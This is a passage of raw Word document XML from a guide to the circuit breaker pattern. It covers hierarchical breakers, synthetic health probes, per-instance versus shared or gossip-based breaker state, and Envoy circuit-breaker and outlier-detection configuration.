        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>10.4 Hierarchical Circuit Breakers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BCB19C9" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Multi-level circuit breaking:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59A8F2E2" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="417AB127" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>Per-instance CB:  Each backend instance has its own circuit breaker</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AEAF1F9" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">     ↓</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="425197E7" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>Per-cluster CB:   If too many instances are circuit-broken → cluster-level circuit opens</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F3D4678" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">     ↓</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CC5435B" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>Per-region CB:    If the entire cluster is unhealthy → region-level failover</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36B5EB20" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C0A0835" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1047"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Payment service has 10 instances.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27E9D470" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1047"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Individual instance circuit breakers protect against single-host issues.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="508797D7" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1047"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>If &gt; 50% of instances have their circuit breaker open → cluster-level circuit opens → failover to backup payment processor.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CD8F40F" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>10.5 Circuit Breaker with Automatic Recovery Testing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A17E54D" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Problem:</w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:t> Half-open state sends production traffic as probes. If the downstream is still broken, real users experience failures.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71C48C91" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Solution — Synthetic probes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C518F76" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>When the circuit is open:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FF97436" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1048"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Instead of waiting for the timeout and testing with REAL traffic:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FEC2D5C" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1048"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Send synthetic health check requests (not user requests) periodically.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4294F212" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1048"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>These probe requests are specifically designed to test the downstream's health.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67177999" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1048"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:lastRenderedPageBreak/>
        <w:t>Only when synthetic probes succeed → transition to half-open → allow real traffic.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AA0D35A" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56D8E555" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>OPEN state:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59E2CC36" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">  Every 5 seconds: send synthetic probe to downstream</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CC127C1" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">    - GET /health or lightweight known-good request</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="491F05C8" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">    - If synthetic probe succeeds → transition to HALF-OPEN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="462DAE6F" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">    - If synthetic probe fails → stay OPEN, try again in 5 seconds</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6189BDED" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644"/>
    <w:p w14:paraId="7C48129F" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>HALF-OPEN state:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73FF62AF" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">  Allow limited real traffic through (as before)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2779B668" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">  If successful → CLOSED</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03577DBD" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">  If not → OPEN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E7F79DA" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Benefit:</w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:t> No real user traffic is sacrificed for recovery testing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B7270E6" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:pict w14:anchorId="6AD29AFD">
          <v:rect id="_x0000_i4252" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4061CCB8" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>11. Circuit Breaker in Distributed Systems — Special Considerations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02F78C49" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>11.1 Distributed Circuit Breaker State</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DCD6D09" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The problem:</w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:t> In a system with 50 instances of Service A calling Service B:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CDCEC07" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1049"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Each instance has its own circuit breaker.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4257BFC1" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1049"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Instance 1 sees 100% failures → trips its circuit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B6428A7" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1049"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Instance 2 sees 0% failures (by chance, its requests hit healthy Service B instances).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C786AD5" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1049"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Inconsistent behavior across instances.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02A730E5" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Options:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="630B678E" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Local (per-instance) circuit breakers (most common):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47908C6D" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1050"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Each instance manages its own state independently.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F681A47" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1050"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Pro: No coordination overhead. No shared state to manage.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27C4BFC1" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1050"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:lastRenderedPageBreak/>
        <w:t>Con: Inconsistent behavior. One instance might have its circuit open while others don't.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41FD1E2A" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1050"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>This is usually ACCEPTABLE because each instance's view of the downstream is a valid sample.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="267AFCF0" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Shared/distributed circuit breaker:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57464832" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1051"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Circuit breaker state is shared (e.g., in Redis or a coordination service).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E4C8B2B" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1051"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>All instances see the same circuit state.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1983C4C5" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1051"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Pro: Consistent behavior. One detection = all instances protected.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F206C5E" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1051"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Con: Adds a dependency (Redis). If Redis is down, circuit breaker doesn't work. Latency for every state check (network round-trip to Redis).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49EA31D5" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Gossip-based circuit breaker:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38869092" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1052"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Instances share their circuit breaker observations via gossip protocol.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D6502DD" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1052"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Each instance maintains a local view but incorporates information from peers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="472B993F" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1052"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>"Instance 3 says downstream is 80% failing" → local instance factors this into its own threshold.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EA2F23B" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1052"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>No central coordination point.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C33B44C" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Recommendation:</w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:t> Use local circuit breakers for most cases. The slightly inconsistent behavior is acceptable because:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6698B2FB" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1053"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>All instances will eventually detect the same failure (just with slightly different timing).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B172C44" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1053"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>The lack of coordination overhead is worth the slight inconsistency.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1309E175" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1053"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Adding a shared store introduces a new failure point (what if Redis is the failing service?).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D1AF42E" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>11.2 Circuit Breaker and Service Mesh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E168F23" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>In a service mesh (Istio/Envoy), circuit breaking is implemented at the proxy layer:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="127DE019" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>YAML</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="020AE345" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t># Envoy circuit breaker configuration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76BD8CC7" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>circuit_breakers:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60CEAFC5" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  thresholds:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="743A04AF" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">    - priority: DEFAULT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70D2B1E5" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">      max_connections: 100           # Max TCP connections to upstream</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DFF9600" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">      max_pending_requests: 50       # Max requests queued awaiting connection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="312A68ED" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">      max_requests: 200              # Max concurrent requests (HTTP/2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4308074B" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">      max_retries: 3                 # Max concurrent retry requests</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="260C8EC1" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">      retry_budget:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ACD5908" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">        budget_percent: 20           # Max 20% of active requests can be retries</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42DD565B" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Envoy's circuit breaking is resource-based, not failure-rate-based:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4046C1B7" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1054"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>It limits CONCURRENT resource usage (connections, requests) rather than tripping on error rates.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75826F74" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1054"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>If max_connections: 100 is reached, the 101st connection attempt gets an immediate 503.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27FABD83" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1054"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Combined with outlier detection (per-host ejection based on error rates) for comprehensive protection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5945148B" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Outlier detection IS the failure-rate circuit breaker in Envoy:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A31FD0D" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>YAML</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AC5AC6B" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>outlier_detection:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C7476C4" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">  consecutive_5xx: 5                     # Eject after 5 consecutive 5xx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AFCF446" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">  interval: 10s                          # Evaluation interval</w:t>
      </w:r>
    </w:p>
